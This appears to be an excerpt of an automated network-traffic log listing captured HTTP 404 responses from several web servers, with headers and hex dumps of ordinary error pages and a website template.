Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:06:40 GMTServer: ApacheContent-Length: 11834Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 66 61 6d 69 6c 79 3d 4a 6f 73 74 3a 77 67 68 74 40 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72 61 72 69 65 73
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:06:42 GMTServer: ApacheContent-Length: 11834Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 47 69 74 61 6c 20 2d 20 44 69 67 69 74 61 6c 20 41 67 65 6e 63 79 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 66 61 6d 69 6c 79 3d 4a 6f 73 74 3a 77 67 68 74 40 35 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 20 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 4c 69 62 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:07:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:07:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:07:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:07:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:07:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 27 Jul 2024 06:07:56 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 27 Jul 2024 06:08:04 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 27 Jul 2024 06:08:37 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 27 Jul 2024 06:08:42 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 27 Jul 2024 06:08:50 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1226Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d ae 7f 05 ab 62 7d 18 46 cb 49 da 61 70 64 07 59 36 6c 03 f6 51 20 1b 8a 3d 05 14 79 6d b1 a1 78 39 92 8a ec 0e fd ef bb 94 28 c7 69 da 01 6d 05 03 96 ee e7 b9 e7 9c ea e9 0f 7f 5c fd f9 f7 ab 1f 59 13 5b b3 9e 55 e9 8f 19 61 b7 ab 02 2c ff eb ba 